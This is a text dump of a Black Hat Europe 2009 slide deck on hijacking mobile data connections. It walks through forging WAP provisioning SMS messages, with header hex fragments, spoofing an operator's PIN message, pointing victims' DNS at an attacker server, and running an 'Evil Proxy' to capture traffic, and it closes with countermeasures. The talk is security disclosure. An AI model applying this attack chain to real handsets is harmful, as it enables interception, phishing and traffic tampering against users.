Tweet
Tweet

Slide 1

Slide 1 text

1 Mobile Security Lab Hijacking Mobile Data Connections Hijacking mobile data connections Cristofaro Mune Roberto Gassirà Roberto Piccirillo Black Hat Europe 2009

Slide 2

Slide 2 text

Agenda l  Provisioning & WAP primer l  Forging Messages l  Demo: Remote provisioning l  Provisioning: Process and Issues l  Attack scenario and exploiting l  Final Demo l  Wrap-Up

Slide 3

Slide 3 text

Poll Who, among the audience, has an Internet capable phone? Please raise your hands!!

Slide 4

Slide 4 text

Net in your hands...et l  Business: Mobile Operators business models mostly based on data revenues. l  Users: Information reachability everywhere l  Technical: Faster speeds, improved UIs l  Social: Smartphones are cool !!!

Slide 5

Slide 5 text

Provisioning l  Mobile Equipment must be configured to inter-operate with mobile infrastructures and services. l  “Provisioning is the process by which a WAP client is configured with a minimum user interaction.” l  Provisioning is performed using WAP architecture capabilities. l  Normally performed by mobile operators...

Slide 6

Slide 6 text

WAP Architecture l  “Wireless Application Protocol defines industry-wide specification for developing applications that operate over wireless communication networks”. l  Application? -  MMS -  Web Browsing -  Provisioning -  ...

Slide 7

Slide 7 text

WAP Communication l  WAP specifies communication protocol framework. l  WAP communication is based on two models: l  Push Model is normally used to send unsolicited data from server to the client. Pull Push

Slide 8

Slide 8 text

Protocol Framework Application Session Service Transfer Service Transport Service Bearer Network

Slide 9

Slide 9 text

Let's build a provisioning message

Slide 10

Slide 10 text

Application - Provisioning Document l  A Provisioning Document provides parameters related to: -  Network Access Points, application specific configuration etc. l  Use cases: -  Provide configuration to new customers -  Reconfigure mis-configured phones -  Enable new services l  Provisioning Document is encoded in Wap Binary XML format (WBXML). WBXML Application Session Service Transfer Service Transport Service Bearer Network

Slide 11

Slide 11 text

Binary Encoding Example WBXML XML provisioning document is encoded in WBXML

Slide 12

Slide 12 text

Session Service - WSP l  WSP provides connectionless service PUSH. l  Delivering provisioning document requires: -  Media type: application/vnd.wap.connectivity- wbxml l  … security information is usually required: -  SEC parameter to specify security mechanism -  Security mechanism related information WBXML WSP Header Application Session Service Transfer Service Transport Service Bearer Network

Slide 13

Slide 13 text

Security Purpose l  Message Authentication protects from accepting malicious messages from untrusted sources. l  Messages with no authentication may be discarded. l  Security based on HMAC to preserve sender authentication and document integrity.

Slide 14

Slide 14 text

Security Mechanism l  Security mechanism used is typically based on “Shared Secret” Based on “Shared Secret” USERP IN NETW PIN USERNET WPIN l  “USERPIN”: key is numeric PIN code chosen by the sender l  “NETWPIN”: key is IMSI l  “USERNETWPIN”: hybrid approach

Slide 15

Slide 15 text

Security Mechanism: USERPIN l  It's based on HMAC algorithm = K = M

Slide 16

Slide 16 text

WSP Primitive Push WBXML WSP Header l  Push primitive is used for sending unsolicited information from server to client 06 01 Transaction ID PDU type Push 2f 1f 2d b6 91 81 92 30 44 38..... 37 44 Push Content Header Length SEC=USERPIN MAC value Content-Type: application/vnd.wap.connectivity-wbxml MAC

Slide 17

Slide 17 text

Transfer Service l  Transfer services provide reliable connection- oriented communications. -  Offers services necessary for interactive request/ response applications l  Transfer service is not required by provisioning process. -  Configurations are sent without using this layer WBXML Application Session Service Transfer Service Transport Service Bearer Network WSP Header

Slide 18

Slide 18 text

Transport Service - WDP l  WDP provides connectionless datagram transport service. l  WDP support is mandatory on any WAP compatible handset. l  WDP can be mapped onto a different bearer. l  WDP over GSM SMS is used to send the message. Application Session Service Transfer Service Transport Service Bearer Network WBXML WSP Header WDP Header

Slide 19

Slide 19 text

l  WDP over GSM-SMS header is defined using UDH headers. l  UDH header contains information for port addressing and concatenated short messages WDP over GSM-SMS WBXML WSP Header UDH Header UDH Length 05 04 0B 84 23 F0 00 03 ... Application Port Addressing Scheme Destination Port 2948 Wap-Push Concatenated SMS

Slide 20

Slide 20 text

Bearer Network – GSM SMS l  GSM SMS PDU mode supports binary data transfer. l  Uncompressed 8-bit encoding scheme is used. l  Concatenated SMS is needed to send a payload larger than 140 bytes. l  Performed tests suggest that no restrictions are imposed on sending SMS-encapsulated provisioning messages. Application Session Service Transfer Service Transport Service Bearer Network WBXML WSP Header UDH Header GSM SMS Header

Slide 21

Slide 21 text

GSM SMS Header WBXML WSP Header UDH Header GSM SMS Header 00 41 00 0C 91 939393939393 00 F5 SMS-SUBMIT PDU message with UDH Header Receiver phone number length Receiver Phone Number UDL Receiver phone number type of address: 91 – International Format Message coding scheme: 8-bit encoding Message Body Length

Slide 22

Slide 22 text

Building a message And now??? Provisioning Document can be easily created USERPIN is defined by the sender We don't need it!! WDP support mandatory on WAP compatible handsets SMS with Provisioning Document are typically unfiltered Provisioning WSP Transfer Service WDP GSM SMS

Slide 23

Slide 23 text

Demo: Profile Installation

Slide 24

Slide 24 text

Provisioning Process

Slide 25

Slide 25 text

Mobile Operator Provisioning l  Many operators use USERPIN shared secret. An Info SMS carrying the shared PIN is sent A Provisioning SMS with network configuration details is sent after Info SMS 1 2

Slide 26

Slide 26 text

Info SMS User takes a note of the pin Operator Number used when sending Info SMS

Slide 27

Slide 27 text

Provisioning SMS The device receives a new SMS notification. User types PIN provided by the Info SMS. New settings overview is showed to the user. 1 2 3

Slide 28

Slide 28 text

Provisioning SMS UI asks to use the new settings as default. Settings are installed as a new Access Point. 4 5

Slide 29

Slide 29 text

Provisioning Issues l  User relies mostly on visual information to trust the received Info SMS. l  Info SMS content can be easily forged. Mobile Operator Service Number Mobile Operator Provisioning SMS typically not filtered!

Slide 30

Slide 30 text

UI Issues l  UI designed to be user friendly … l  … but this could lead to confusing or hidden information: -  Few technical details on provisioning content -  Message source may be hidden or wrongly reported

Slide 31

Slide 31 text

Attack for L(a)unch

Slide 32

Slide 32 text

Appetizer Preparation Issue: Handset displays phone number of Info SMS sender Suspicious users may not accept the configuration message Solution: SMS sender spoofing Info SMS could appear as legitimate and sent by Operator

Slide 33

Slide 33 text

Cooking: SMS spoofing

Slide 34

Slide 34 text

Attack Scheme Spoofed Info SMS carrying the PIN is sent (with Mobile Operator Service number) 1 2 Attacker Provisioning SMS is sent after Info SMS

Slide 35

Slide 35 text

Variations and Issues •  Different attack “flavours”, depending on the handset: -  Attacker configuration is automatically installed as the default -  User is asked at installation time if the configuration has to be installed as the default -  User is asked at connection time which configuration should be used for connection l  In some cases (eg: customized handsets) it may not be possible to change the default configuration l  Additional operations may be required from user

Slide 36

Slide 36 text

Appetizer Recipe No Push Messages filtering in place: both on handset and network Some UIs do not show enough information to users + = Tricks users into accepting malicious configurations

Slide 37

Slide 37 text

Next choice... l  Provisioning message provides data connection parameters. l  If a victim accepts a malicious message, connection parameters are under attacker control l  Multiple interesting choices : -  APN -  DNS address -  Proxy Which is the best one???

Slide 38

Slide 38 text

Main Course Preparation The parameter that seems to provide the best control of a victim is... “DNS-ADDR” Let's start cooking...

Slide 39

Slide 39 text

DNS Subverting l  “Domain Name System (DNS) is used to map between hostnames and IP addresses.” l  “DNS-ADDR” parameter indicates the DNS IP address used by the data connections. l  By adding the DNS-ADDR parameter to the default data connection, the DNS can be subverted. l  Victim DNS queries are then directed toward an attacker-chosen DNS server.

Slide 40

Slide 40 text

XML example with DNS Network Access Point Name APN Address for Data Connection DNS Address NAPDEF Reference Network Type Format of the Address in NAP-ADDRESS

Slide 41

Slide 41 text

But... Are DNS queries allowed to exit an Operator Network?? Tests have been performed on all the Operator Networks we had access to … -  The operator may force the use of specific DNS server and the answer is...

Slide 42

Slide 42 text

Escaping the matrix Definitely YES!!! Dial-up using Handset as Modem Default route via Mobile Operator Network Successful query to external DNS server (OpenDNS)

Slide 43

Slide 43 text

Main Course Recipe Modify default DNS in victim's phone Operator networks allow queries to external DNS server + = Redirection of victim DNS queries

Slide 44

Slide 44 text

0wning DNS l  Subverting DNS query toward attacker controlled DNS server yields the same effects of DNS poisoning attack. l  DNS poisoning threats have been widely explored: -  Traffic redirection -  Phishing -  MITM attack -  SSL attack l  All DNS queries, for ANY domain (!!), are completely under attacker control.

Slide 45

Slide 45 text

Next choice Let's focus on HTTP traffic redirection and MITM attack!!! l  Most inviting options is HTTP: l  Many mobile applications and services are based on HTTP protocols: -  Browsers -  Messaging -  ... l  Some Mobile Operators business models are based on providing services via internal HTTP web sites.

Slide 46

Slide 46 text

Standard HTTP transaction Mobile user wants to visit www.mseclab.com DNS Query DNS Answer GET / HTTP/1.1 Mobile Operator Network Internet

Slide 47

Slide 47 text

Redirect HTTP transaction Mobile user wants to visit www.mseclab.com DNS Query GET / HTTP/1.1 Mobile Operator Network Internet DNS Answer (Evil Proxy IP)

Slide 48

Slide 48 text

XML with APPLICATION settings Used to define Application Parameters DNS Address Link to APN defined Browsing Applications Identifier defined by OMNA

Slide 49

Slide 49 text

Dessert Recipe Fake DNS (answering any query with Evil Proxy IP Address) WBXML provisioning message (setting handset DNS address to Fake DNS) + = Owning victim data traffic by means of DNS control Evil Proxy (intercepting and forwarding the HTTP traffic) +

Slide 50

Slide 50 text

Serving the meal ...

Slide 51

Slide 51 text

Evil Proxy How-to l  Transparent proxy is just what we need. l  Apache+Mod-Proxy is a good starting point: l  Mod-Rewrite is used for proper redirection.

Slide 52

Slide 52 text

Mod-Security Power l  Now we are able to redirect the HTTP traffic as we want! l  It would be cool to access the traffic... l  … Mod-Security Audit feature is the solution!

Slide 53

Slide 53 text

Demo [Hijacking remote mobile user browsing] WARNING: Mobile connections on the test handsets will be monitored!!! so… Do NOT enter personal information or URL!!!

Slide 54

Slide 54 text

What can be achieved? l  User monitor and profiling l  Hijacking and control of application specific data traffic -  IM, VoIP, Social Networks l  Traffic Injection -  Redirection to 3rd party websites -  Advertisements (→ Spamming) -  Modification of served web pages

Slide 55

Slide 55 text

Focus on Issues l  The attack does not rely on the exploitation of a single vulnerability l  Issue at the 'system' level: -  Small overlooked details concur in allowing a deeper exploitation l  The following made this attack possible: -  Lack of Provisioning message filtering -  UIs do not provide a sufficient level of details l  Spoofing sharpen the issue! -  Mobile Operator Networks allow use of external DNS servers

Slide 56

Slide 56 text

Countermeasures l  Filter external provisioning messages: -  Network side -  Handset Side (may be ineffective in case of spoofing) l  UI Improvements: -  Provide proper detail level and warnings -  May be ineffective in case of message spoofing l  Deny access to external DNS servers: -  Could make the attack more difficult -  May be unsuitable for some Operators -  If used alone may cause massive connectivity DoS

Slide 57

Slide 57 text

Future Research l  Future research will focus on: -  Application Data Hijacking -  HTTPS traffic snooping -  Malicious Payload Injection -  Targeting Mobile Operator internal networks -  Botnets

Slide 58

Slide 58 text

Q&A Thanks !!! Mobile Security Lab [email protected]

Slide 59

Slide 59 text

References l  OMA - Provisioning Architecture Overview v1.1 l  OMA - WAP Architecture v12 l  OMA - Push Architectural Overview v3 l  OMA - Provisioning Content v1.1 l  OMA – Provisioning Bootstrap v1.1 l  OMA - Binary XML Content Format Specification v1.3 l  OMA - Wireless Session Protocol Specification v5 l  OMA - OMNA WSP Content Type Numbers l  OMA - Wireless Datagram Protocol Specification v14 l  3GPP - TS 03.40 Technical realization of the Short Message Service (SMS) v7.5.0 l  Apache HTTP Server Project l  ModSecurity: Open Source Web Application Firewall